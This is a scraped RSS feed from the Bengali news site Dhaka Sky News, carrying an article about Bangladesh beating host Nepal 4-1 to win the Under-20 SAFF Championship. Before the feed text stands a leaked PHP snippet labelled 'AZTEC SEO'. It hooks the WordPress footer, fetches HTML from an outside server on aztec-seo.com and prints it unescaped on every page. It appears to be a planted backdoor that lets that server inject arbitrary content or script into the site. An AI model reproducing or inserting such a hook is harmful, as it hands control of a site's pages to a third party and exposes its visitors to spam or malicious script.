/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); অনূর্ধ্ব-২০ সাফ চ্যাম্পিয়নশিপ – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Thu, 29 Aug 2024 04:55:58 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 নেপালকে হারিয়ে সাফ চ্যাম্পিয়ন বাংলাদেশ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/#respond Thu, 29 Aug 2024 04:52:29 +0000 https://www.dhakaskynews.com/?p=5458 অনূর্ধ্ব-২০ সাফ চ্যাম্পিয়নশিপে স্বাগতিক নেপালকে ৪-১ গোলে হারিয়ে প্রথমবারের মতো চ্যাম্পিয়ন বাংলাদেশের যুবারা।

টুর্নামেন্টের গ্রুপ পর্বে এই নেপালের বিপক্ষে ২-১ ব্যবধানে হারতে হয়েছিল যুবাদের। তাই ফাইনালের আগে বাড়তি স্নায়ুচাপ ছিল মিরাজুলদের। তবে শেষ পর্যন্ত ওই চাপ সামলে দাপটের সাথেই শিরোপা জয় করেছে মারুফুল হকের শিষ্যরা।

নেপালের আনফা কমপ্লেক্সে প্রথমার্ধে দাপট দেখিয়েছিল স্বাগতিক নেপাল। কিন্তু গোল তাদের জন্য সোনার হরিণ হয়ে থেকেছে।

বিপরীতে দারুণ এক ফ্রি কিক থেকে এগিয়ে যায় বাংলাদেশ। বক্সের বাইরে থেকে মিরাজুলের ফ্রি কিক থেকে নেওয়া বাঁকানো শট সাইড পোস্টের ভেতরে লেগে জালে জড়িয়ে যায়। এই গোলের লিড নিয়ে প্রথমার্ধের খেলা শেষ হয়।

দ্বিতীয়ার্ধে বাংলাদেশ আক্রমণের তেজ বাড়ায়। তাই আরও তিন গোল করতে সক্ষম হয় সফরকারীরা। প্রথম গোলের কারিগর মিরাজুলের পায়েই দ্বিতীয় গোল হয়। আসাদুল ইসলাম সাকিবের ক্রসে আসাদুল মোল্লা হেড করে গোলমুখে দেন, মিরাজ চলতি বলে মাথা ছুঁইয়ে বল জালে পাঠান।

প্রথম দুই গোল করা মিরাজুল দলের তৃতীয় গোলটি করান রাব্বি হাসান রাহুলকে দিয়ে। তার পাস ধরেই আনমার্কড অবস্থায় থাকা রাহুল ডান পায়ের নিখুঁত শটে গোল করে বাংলাদেশের জয় একপ্রকার নিশ্চিত করে ফেলেন।

স্বাগতিকদের বেহাল দশা দেখে ক্ষিপ্ত হয়ে মাঠে বোতল ছুঁড়ে মারেন নেপালি সমর্থকরা। যার ফলে খেলা কিছু সময় বন্ধও থাকে। দর্শকরা তাঁতিয়ে দেওয়ার পর নেপালি ফুটবলারদের খেলায় প্রাণ ফিরে আসে। ম্যাচের শেষভাগে একটি গোল পেয়ে যায় তারা।

পরে ১০ মিনিট যোগ করা সময় পেলেও আর গোল করতে পারেনি স্বাগতিকরা। উল্টো শেষদিকে পিয়াস আহমেদ নোভা বল জালে জড়ালে বড় জয়ে শিরোপা উৎসব করে লাল-সবুজের প্রতিনিধিরা।

দেশের খ্যাতিমান কোচ মারুফুল হকের অধীনে এবারই প্রথম অনূর্ধ্ব-২০ সাফের শিরোপা জয় করল বাংলাদেশের দামালরা।

]]>
https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/feed/ 0